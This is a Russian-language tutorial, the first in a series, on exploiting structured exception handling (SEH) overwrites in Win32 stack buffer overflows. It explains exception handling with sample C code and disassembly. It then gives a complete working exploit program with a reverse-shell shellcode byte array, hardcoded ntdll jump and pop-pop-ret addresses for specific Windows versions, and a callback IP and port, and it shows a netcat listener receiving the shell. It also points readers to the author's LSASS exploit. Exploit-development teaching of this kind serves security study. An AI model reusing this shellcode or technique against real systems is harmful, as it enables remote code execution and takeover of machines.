Эксплуатирование SEH в среде Win32. Часть первая.

4892 просмотра за 1 неделю

Переполнение буфера в стеке.

(c) houseofdabus

В этой статье рассматриваются достаточно специфические уязвимости, связанные с подменой обработчика исключений (SEH), которые успешно применяются как при переполнении буфера в стеке, так и при переполнении кучи.

Меня немного расстроило то, что на эту тему нет ни одной русскоязычной статьи, а все англоязычные статьи рассматривают эту тему очень кратко, поэтому я решил написать целых три статьи посвященные эксплуатированию SEH.

Первая (данная статья) затрагивает немного теорию обработчиков исключений и методы получения контроля над приложением при переполнении буфера в стеке посредством перезаписи SEH-фрейма.

Вторая часть будет посвящена переполнению кучи и тому, как можно подменить фильтр необработанных исключений и тем самым внедрить свой код.

А в третьей статье я расскажу, как с помощью SEH можно обойти механизм защиты стека от переполнения, который применяется в Windows 2003 Server.

Чтобы не было расхождений, все примеры, которые рассматриваются в статье, стоит компилировать с помощью MS VC++ 6.0 или lcc-win32.

Что такое SEH?

SEH - это сокращение от Structured Exception Handling и переводится как структурная обработка исключения. Исключение - это событие к которому приводит ненормальное (неправильное) поведение кода, например, исключение, возникает при обращение к невыделенной области памяти (и как следствие возникает нарушение доступа) или при делении на нуль.

Исключения бывают двух типов:

• Аппаратные, которые генерирует (возбуждает) процессор;
• Программные, которые могут генерировать операционная система или приложение.

У каждого исключения есть свой код, их определения можно посмотреть в файлах winbase.h и winnt.h. Например, исключение, связанное с нарушением доступа имеет следующее определение и код:

#define EXCEPTION_ACCESS_VIOLATION       STATUS_ACCESS_VIOLATION
#define STATUS_ACCESS_VIOLATION          ((DWORD   )0xC0000005L)

Любое исключение, как аппаратное, так и программное, можно обработать.

Ниже представлен синтаксис обработчика исключения:

__try {
	// защищенный код,
	// который помещается в SEH-фрейм
}
__except (фильтр исключений) {
	// обработчик исключений
}

Если при выполнении кода из блока __try {...}, возникнет исключение, то операционная система перехватит его и приступит к поиску блока __except. Найдя его, она передаст управление фильтру исключений. Фильтр исключений может получить код исключения и на основе этого кода принять решение, передать управление обработчику или же сказать системе, чтобы она искала предыдущий по вложенности блок __except. Фильтр исключений может возвращать одно из трех значений (идентификаторов), которые определены в файле excpt.h:

EXCEPTION_EXECUTE_HANDLER       1
EXCEPTION_CONTINUE_SEARCH       0
EXCEPTION_CONTINUE_EXECUTION   -1

Идентификатор EXCEPTION_EXECUTE_HANDLER говорит системе, что для этого блока __try есть обработчик исключения и он готов обработать это исключение.

Идентификатор EXCEPTION_CONTINUE_SEARCH говорит системе, чтобы она искала

предыдущий по вложенности блок __except, а идентификатор EXCEPTION_CONTINUE_EXECUTION говорит ей, чтобы она снова продолжала выполнение с того места кода, который вызвал исключение.

Рассмотрим пример с обработчиком исключений:

<except.c>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

void
except_sample()
{
	__try {
		printf("start of __try\r\n");

		// возбуждаем исключение
		*(char *)0 = 0;

		// этот кусок кода никогда не выполнится
		printf("end of __try\r\n");
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("!!! exception !!!\r\n");
	}

	printf("end of except_sample\r\n");
}

int
main(int argc, char **argv)
{

	except_sample();

	printf("end of main\r\n");


return 0;
}

C:\samples>except.exe
start of __try
!!! exception !!!
end of except_sample
end of main

C:\samples>

В этом примере в качестве фильтра исключения мы сразу подставляем идентификатор EXCEPTION_EXECUTE_HANDLER, тем самым мы перехватываем все исключения, которые могут возникнуть при выполнении кода из блока __try {...}.

Помимо обработчиков исключения есть еще не менее важная вещь – обработчик завершения. Смысл его в том, что независимо от того, что произойдет в защищенном участке кода, обработчик завершения будет выполнен. Его синтаксис выглядит следующим образом:

__try {
	// защищенный код

}
_finally {
	// обработчик завершения

}

Другими словами, вне зависимости от того выполнится защищенный код целиком без ошибок или все же произойдет ошибка (исключение), обработчик завершения получит управление.

Главное отличие обработчика завершения от обработчика исключения заключается в том, что фильтры и обработчики исключений получают управление непосредственно от операционной системы и нагрузка на компилятор минимальна.

Теперь посмотрим, как операционная система находит обработчики исключений и как передает им управление.

Каждый защищенный блок кода, получив управление, прописывает свой обработчик в специальную область, называемую TIB (Thread Information Block), и при этом сохраняет старый обработчик. Происходит это следующим образом:

В TIB по смещению 0 отведена специальная область для сохранения адреса текущего фильтра исключений. Компилятор перед защищенным блоком вставляет специальный код, приблизительно следующего вида:

   push   _Handler     ; помещаем в стек адрес нашего фильтра
   mov    eax, FS:[0]  ; записаваем в eax адрес структуры 
                       ; предыдущего обработчика
   push   eax          ; записываем его в стек
   mov    FS:[0], esp  ; устанавливаем в TIB адрес нашей структуры

Этот код формирует в стеке структуру (SEH-фрейм) вида

struct EXCEPTION_REGISTRATION
{
   EXCEPTION_REGISTRATION *prev;
   DWORD *handler;
};

В этой структуре указывается адрес предыдущей (по вложенности) структуры и адрес фильтра. Таким образом, формируется цепочка структур обработчиков исключений, как показано на рис.1.

Рис.1. Цепочка структур EXCEPTION_REGISTRATION.

Каждый последующий вложенный защищенный блок кода добавляет свое звено в эту цепочку. И наоборот, когда защищенный блок кода завершает свою работу он убирает свое звено из цепочки и сдвигает указатель в TIB (тоже самое делает и обработчик, если произошло исключение). Вот почему это называется структурной обработкой исключений.

Теперь посмотрим, что делает система, когда генерируется исключение.

Сразу после того, как система перехватила исключение, она просматривает TIB потока, в котором произошло это исключение и начинает последовательно по цепочке передавать управление фильтрам. Если какой-то из фильтров исключений возвращает идентификатор EXCEPTION_EXECUTE_HANDLER, то дальше происходит так называемая глобальная раскрутка (global unwind). Глобальная раскрутка приводит к продолжению обработки всех вложенных блоков try-finally (обработчиков завершения), выполнение которых началось вслед за блоком try-except, и только после этого управление получает сам обработчик исключений.

И так, мы теперь знаем, что происходит при возникновении исключения и кем и как обработчик запускается. Знаем, что для каждого потока устанавливается свой SEH. А что произойдет, если исключение возникло, но обрабатывать его некому (необработанное исключение)?

Необработанное исключение

Для того чтобы понять, что такое необработанное исключение, рассмотрим классическую уязвимость переполнения буфера в стеке:

<simple1.c>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

void
vuln(char *ptr)
{
	char buf[16];

	strcpy(buf, ptr);
}

int
main(int argc, char **argv)
{
	char buf2[128];

	memset(buf2, 0x41, 128);
	buf2[32] = '\0';

	vuln(buf2);

	printf("end of main\r\n");


return 0;
}

Как мы видим, в функции vuln копируется строка по указателю ptr в локальный буфер buf, без проверки на размер. Передав этой функции строку, размером больше 16 байт, мы тем самым выходим за пределы буфера и затираем соседние данные в стеке. В стеке выше буфера buf находятся сохраненные регистры ebp и eip (рис.2), т.е. выходя за пределы буфера, мы можем затереть сохраненные ebp и адрес возврата eip нашими данными.

Рис. 2. Состояние стека перед вызовом strcpy.

Скомпилируем sample1.c и посмотрим, что произойдет при выполнении:

C:\samples>sample1.exe

Рис. 3. Необработанное исключение.

В нашем примере при копировании строки размером 32 байта происходит переполнение буфера buf и как следствие затирание сохраненного адреса возврата eip. После этого функция vuln заканчивает свое выполнение, очищает стек от локальных переменных и выходит (эпилог функции):

	mov esp, ebp
	pop ebp
	ret

Т.к. сохраненный адрес возврата после переполнения теперь принял значение 0x41414141, то выполнение программы продолжается с этого адреса (т.е. с 0x41414141). Этот адрес не имеет отображение на физическую память (т.е. память не выделена), поэтому процессор генерирует исключение.

Дальше начинается самое интересное.

Операционная система перехватывает его и выбирает в потоке текущий фильтр исключений и передает ему управление.

Но в нашем примере нет фильтра исключений, кто же тогда выполняется?

Дело в том, что при создании любого процесса к нему сразу добавляется обработчик исключений (фильтр) UnhandledExceptionFilter. Так называемый, фильтр необработанных исключений, который является самым верхним обработчиком (TOP SEH) для всех потоков процесса. В нашем случае, так как у нас нет своих обработчиков, то ему и передается управление. Этот обработчик сохраняет контекст процесса и выводит сообщение об ошибке (рис.3), которое говорит нам что:

"Инструкция по адресу "0x41414141" обратилась к памяти

по адресу "0x41414141". Память не может быть "read".".

Если нажать "ОК", то процесс завершится, а если "Отмена", то UnhandledExceptionFiler запустит отладчик и подключит его к процессу.

Примечание: отладчик прописывается в реестре, в разделе

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug

SEH фрейм

Добавим теперь в функцию vuln обработчик исключений и посмотрим что произойдет:

<seh1.c>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

void
vuln(char *ptr)
{
	char buf[16];

	__try {
		printf("start of strcpy\r\n");
		strcpy(buf, ptr);
		printf("end of strcpy\r\n");
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("exception\r\n");
	}

	printf("end of vuln\r\n");
}

int
main(int argc, char **argv)
{
	char buf2[128];

	memset(buf2, 0x41, 128);
	buf2[32] = '\0';

	vuln(buf2);

	printf("end of main\r\n");


return 0;
}


C:\samples>seh1.exe
start of strcpy
end of strcpy
end of vuln
end of main

C:\samples>

Как не странно никакого исключения не произошло, функция vuln скопировала строку в буфер и успешно возвратила управление функции main. Посмотрим состояние стека перед вызовом strcpy (рис.4).

Рис.4. Состояние стека перед вызовом strcpy.

Как мы видим, состояние стека изменилось. Теперь между буфером buf и сохраненными регистрами ebp и eip добавились блоки SEH-frame и блок с адресом вершины стека.

Блок SEH-frame есть ни что иное, как структура EXCEPTION_REGISTRATION, о которой рассказывалось ранее, с двумя дополнительными полями, которые добавил компилятор. Первое поле ID необходимо для раскрутки (unwind) и в самом первом звене цепочки SEH оно принимает значение 0xFFFFFFFF, и сигнализирует об окончании, т.е. является признаком последнего звена. Каждая последующая функция, которая имеет обработчик исключений, устанавливают ID в 0, и увеличивает это значение на единицу с каждым последующим вложенным блоком __try.

Следующее поле, которое на рисунке обозначено как *pointer, является указателем на область памяти, в которой содержится структура вида

long ID        - принимает значение 0xFFFFFFFF
	long *pointer1
	long *pointer2

Этой структурой оперирует фильтр исключений.

Указатель poiner1 содержит адрес блока кода, который возвращает одно из трех значений идентификатора фильтра исключений (EXCEPTION_EXECUTE_HANDLER, EXCEPTION_CONTINUE_SEARCH или EXCEPTION_CONTINUE_EXECUTION). Следующий указатель (pointer2) указывает на начало блока обработчика исключений.

Последующие поля *Handler и *prev_Handler указывают соответственно на фильтр исключений и на предыдущий SEH-фрейм.

Чтобы разобраться в этом более детально посмотрим, какой код генерирует компилятор.

функция vuln (все значения в hex виде):

push      ebp       ; стандартный пролог
	mov       ebp,esp   ; функций

	push      0FF       ; устанавливаем ID
	push      0004050A8 ; записываем *pointer
	push      00040121C ; и адрес фильтра исключений

	mov       eax,fs:[000000000] ; извлекаем из TIB адрес
                                   ; предыдущего SEH-фрейма
	push      eax                ; и сохраняем его в стеке
	mov       fs:[000000000],esp ; Устанавливаем в TIB
                                   ; адрес нашего SEH-фрейма

	sub       esp,018            ; Выделяем в стеке
                                   ; 8 байт для сохранения esp (*)
                                   ; + область для буфера buf

	push      ebx                ; сохраняем регистры ebx,
	push      esi                ; esi и
	push      edi                ; edi

	mov       [ebp][-0018],esp   ; сохраняем esp в заранее
                                     ; отведенную область в стеке cм.(*)

	mov       d,[ebp][-0004],000000000 ; устанавливаем ID в 0

      ; printf("start of strcpy\r\n");
	push      00040605C ; записываем адрес строки 
	call      _printf   ; вызываем printf

      ; strcpy(buf, ptr);
	push      d,[ebp][00008] ; ptr
	push      d,[ebp][-0028] ; buf
	call      _strcpy        ; вызываем strcpy

      ; printf("end of strcpy\r\n");
	push      00040604C ; записываем адрес строки
	call      _printf   ; вызываем printf

	add       esp,010   ; очищаем стек от параметров
			        ; сдвигаем вершину стека на 16

      ; если все прошло успешно, то
	jmps      $LABEL1   ; переходим к окончанию
                          ; блока try-except



; *pointer1

	mov       eax,000000001 ; возвращаем идентификатор
	retn                    ; EXCEPTION_EXECUTE_HANDLER

; *pointer2
; код обработчика исключений ( блок __except() {...} )
	mov       esp,[ebp][-0018] ; восстанавливаем состояние стека
                                 ; см. (*)

      ; printf("exception\r\n");
	push      000406040        ; записываем адрес строки
	call      _printf          ; вызываем printf
	add       esp,004          ; очищаем стек от параметров



; конец блока try-except
$LABEL1:

	mov       d,[ebp][-0004],0FFFFFFFF ; восстанавливаем ID

      ; printf("end of vuln\r\n");
	push      000406030 ; записываем адрес строки
	call      _printf   ; вызываем printf
	add       esp,004   ; очищаем стек от параметров

	mov       ecx,[ebp][-0010]   ; берем адрес предыдущего
                                   ; SEH-фрейма
	mov       fs:[000000000],ecx ; и сохраняем его в TIB

	pop       edi      ; восстанавливаем регистры edi,
	pop       esi      ; esi
	pop       ebx      ; и ebx

      ; эпилог функции
	mov       esp,ebp                      
	pop       ebp                          
	retn                       

Теперь вернемся к нашему примеру (seh1.c) и посмотрим что произошло.

Функция strcpy, копируя строку размером 32 байта, вышла за пределы буфера и затерла данные, которые находились выше буфера - это блок с сохраненным регистром esp и 8 байт из SEH-фрейма, поэтому никакого исключения и не произошло.

Вот теперь мы подошли к самому интересному.

Очевидно, что, переполняя буфер, мы можем изменять SEH-фрейм так, как захотим. Например, мы может изменить/подменить адрес фильтра исключений и через исключение передать ему управление.

Подмена SEH-фрейма

Многие, наверное, спросят, а зачем так усложнять ситуацию, если можно воспользоваться старым классическим методом подмены адреса возврата?

Дело в том, что код уязвимой функции может быть намного сложнее, например, если функция vuln будет принимать не один параметр, а два:

void vuln(char *ptr, char *ptr2)
{
        ...
	__try {
               ...
               strcpy(buf, ptr);
               // что-то делаем с данными
               ...
               strcpy(ptr2, buf);
               ...
        }
        __except (...) {
               ...
        }

...
}

В этом случае, переполнив буфер, мы затираем помимо адреса возврата еще и указатели ptr и ptr2 и второй вызов функции strcpy приведет к генерации исключения, поэтому выход из функции может не произойти должным образом. Конечно, мы можем попытаться подобрать адрес выделенной области памяти необходимых размеров, у которой есть права на запись, но это будет очень не стабильный вариант или не такой универсальный.

Теперь приступим к практической части, для этого немного изменим наш пример:

<seh2.c>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

void
vuln(char *ptr, char *ptr2)
{
	char buf[16];

	__try {
		printf("start of strcpy\r\n");
		strcpy(buf, ptr);

		// делаем что-то с данными в буфере
		// ...

		// возбуждаем исключение
		*(char *)0 = 0;

		strcpy(ptr2, ptr);
		printf("end of strcpy\r\n");
	}
	__except(EXCEPTION_EXECUTE_HANDLER) {
		printf("exception\r\n");
	}

	printf("end of vuln\r\n");
}

void
secfunc(void)
{
	printf("good job!\r\n");
	exit(0);
}

int
main(int argc, char **argv)
{
	unsigned char buf2[128];
	unsigned char *tmpptr;

	void (*ptrfunc)();

	// узнаем адрес функции secfunc
	ptrfunc = secfunc;
	printf("ptrfunc = %p\r\n", ptrfunc);

	memset(buf2, 0x41, 128);

	// если компилятор MS VC++
	buf2[32] = 0x00;

	// если компилятор lcc-win32
	// buf2[36] = 0x00;

	tmpptr = (unsigned char*)ptrfunc;

	// если компилятор MS VC++
	memcpy(buf2+28, &tmpptr, 4);

	// если вы используете компилятор, lcc-win32,
	// то смещение нужно увеличить на 4
	// memcpy(buf2+32, &tmpptr, 4);

	Sleep(3000);
	vuln(buf2, buf2);

	printf("end of main\r\n");

return 0;
}

Для начала попробуем что-то попроще, например, подменить адрес фильтра исключений на адрес функции secfunc() и вызвать исключение для того, чтобы подмененный фильтр выполнился.

Для этого, во-первых, узнаем адрес функции secfunc():

	void (*ptrfunc)();
	ptrfunc = secfunc;

А во вторых, сформируем строку, которой мы будем переполнять буфер и подменять фильтр исключений, эта строка будет иметь размер в 32 байта (без учета нуля на конце):

AAAA...AAAAA - 28 байт
<адрес функции secfunc>

Посмотрим что получится:

C:\samples>seh2.exe
ptrfunc = 004010D0
start of strcpy
good job!

C:\samples>

Все получилось, как мы и задумывали.

Но это был совсем простой пример, теперь рассмотрим более жизненный пример - попробуем записать в стек какой-нибудь код и передать ему управление.

Тут и возникает вопрос, как передать нашему коду управление?

Первое что приходит на ум - это перезаписать адрес фильтра исключения на адрес инструкции jmp esp или call esp. Но, проверив это на деле, я так и не добился нужного результата. Покопавшись с отладчиком, я заметил, что состояние стека изменяется и что самое печальное, при возникновении исключения изменяется и указатель на стек.

Но решение этой проблемы все же есть, и оно было найдено. Дело в том, что при передачи управления фильтру исключений в регистр ebx записывается адрес текущего SEH-фрейма (т.е. адрес поля *prev_Handler, см. рис. 4). Поэтому, чтобы передать управление нашему коду, нужно:

1) Перезаписать адрес фильтра в SEH-фрейме адресом инструкции jmp ebx или call ebx.

2) Перезаписать поле *prev_Handler на которое указывает регистр ebx инструкцией jmps <смещение>, чтобы перескочить поле *Handler (адрес фильтра).

3) Записать нужный код после поля *Handler.

4) Вызвать исключение, чтобы управление передалось фильтру.

Еще одна проблема была выявлена при тестировании этого метода в операционной

системе Windows XP. В отличие от Windows 2000, в XP, перед тем как передать управление фильтру исключений, очищаются все регистры и в том числе ebx. И ни один из регистров явным образом не указывает на SEH-фрейм. Видимо Microsoft таким образом решила повысить безопасность своих продуктов. Проведя некоторое время за отладчиком, мне удалось решить и эту проблему.

Адрес SEH-фрейма был найден в стеке и на момент вызова фильтра исключений он находится по адресу esp+8. В этом случае нам достаточно найти адрес инструкций pop reg, pop reg, ret и перезаписать им адрес фильтра в SEH-фрейме. А все остальное проделать так же, как описано в пунктах 2, 3 и 4.

Теперь опробуем все это на деле.

<sehexpl.c>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib, "ws2_32")

// revers shellcode
// подгружает ws2_32.dll
unsigned char shellcode[508]=
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
"\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
"\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
"\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
"\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
"\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
"\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
"\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
"\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
"\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
"\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
"\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
"\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
"\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
"\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
"\xFF\xFF\xFF\xFF";


void
vuln(char *ptr, char *ptr2)
{
	char buf[16];

	__try {
		printf("start of strcpy\r\n");
		strcpy(buf, ptr);

		// делаем что-то с данными в буфере
		// ...

		// После переполнения буфера указатели
		// ptr и ptr2 затираются и при обращении
		// к ним возникает исключение
		strcpy(ptr2, ptr);
		//strcpy(ptr2, buf);
		printf("end of strcpy\r\n");
	}
	__except(EXCEPTION_EXECUTE_HANDLER) {
		printf("exception\r\n");
	}

	printf("end of vuln\r\n");
}


int
main(int argc, char **argv)
{
// jmpaddr:
// 0x77F86656 call ebx      (ntdll.dll) - Win2k Pro SP4 + ms04011
// 0x77FAAE17 push ebx, ret (ntdll.dll) - Win2k Pro SP4 + ms04011

// 0x77F92A9B jmp ebx       (ntdll.dll) - Win2k Pro/Adv SP4
// 0x77F95365 jmp ebx       (ntdll.dll) - Win2k Pro/Adv SP4

// ntdll.dll
// 0x77F555FE pop reg, pop reg, ret - WinXP SP0
// 0x77F61598 pop reg, pop reg, ret - WinXP SP0
// 0x77F5565E pop reg, pop reg, ret - WinXP SP1
// 0x77F6181E pop reg, pop reg, ret - WinXP SP1

	char jmpaddr[8] = "\x56\x66\xF8\x77"; // 0x77F86656;
	char short_jump[8] = "\xEB\x06\x90\x90";
	unsigned short port = 9191; // порт
	unsigned int ip = inet_addr("192.168.1.210"); // IP
	char *portptr = "";
	char *ipptr = "";

	// если компилятор MS VC++
	unsigned char buf2[1024] = "AAAAAAAAAAAAAAAAAAAAAAAA";

	// если компилятор lcc-win32, то +4 байта
	//unsigned char buf2[1024] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA";

	unsigned char dummybuf[1024];

	port = htons(port);
	port = port^0xFFFF;
	portptr = (char *) &port;
	shellcode[209] = portptr[0];
	shellcode[210] = portptr[1];

	ipptr = (char *) &ip;

	shellcode[191] = ipptr[0];
	shellcode[192] = ipptr[1];
	shellcode[193] = ipptr[2];
	shellcode[194] = ipptr[3];

	strcat(buf2, short_jump);
	strcat(buf2, jmpaddr);
	strcat(buf2, shellcode);
	strcat(buf2, "\x00");

	vuln(buf2, dummybuf);

	printf("end of main\r\n");

return 0;
}

Сначала запускаем netcat:

C:\samples\nc>nc.exe -l -p 9191

Потом запускаем sehexpl, который сам же себя эксплуатирует:

C:\samples>sehexpl.exe
start of strcpy

C:\samples>

После этого, если все параметры были установлены правильно (IP адрес, порт и jmp адрес), то мы получим shell:

C:\samples\nc>nc.exe -l -p 9191
Microsoft Windows 2000 [Версия 5.00.2195]
(С) Корпорация Майкрософт, 1985-2000.

C:\samples>

Заключение

В заключение хочу предложить вам для самостоятельного изучения мой эксплоит HOD-ms04011-lsasrv-expl.c, в котором успешно применяется данный метод для атаки сервиса LSASS системы Windows 2000.

(c) houseofdabus

[at inbox dot ru]

Учебный центр "Информзащита" http://www.itsecurity.ru - ведущий специализированный центр в области обучения информационной безопасности (Лицензия Московского Комитета образования № 015470, Государственная аккредитация № 004251). Единственный авторизованный учебный центр компаний Internet Security Systems и Clearswift на территории России и стран СНГ. Авторизованный учебный центр компании Microsoft (специализация Security). Программы обучения согласованы с Гостехкомиссией России, ФСБ (ФАПСИ). Свидетельства об обучении и государственные документы о повышении квалификации.

Компания SoftKey – это уникальный сервис для покупателей, разработчиков, дилеров и аффилиат–партнеров. Кроме того, это один из лучших Интернет-магазинов ПО в России, Украине, Казахстане, который предлагает покупателям широкий ассортимент, множество способов оплаты, оперативную (часто мгновенную) обработку заказа, отслеживание процесса выполнения заказа в персональном разделе, различные скидки от магазина и производителей ПО.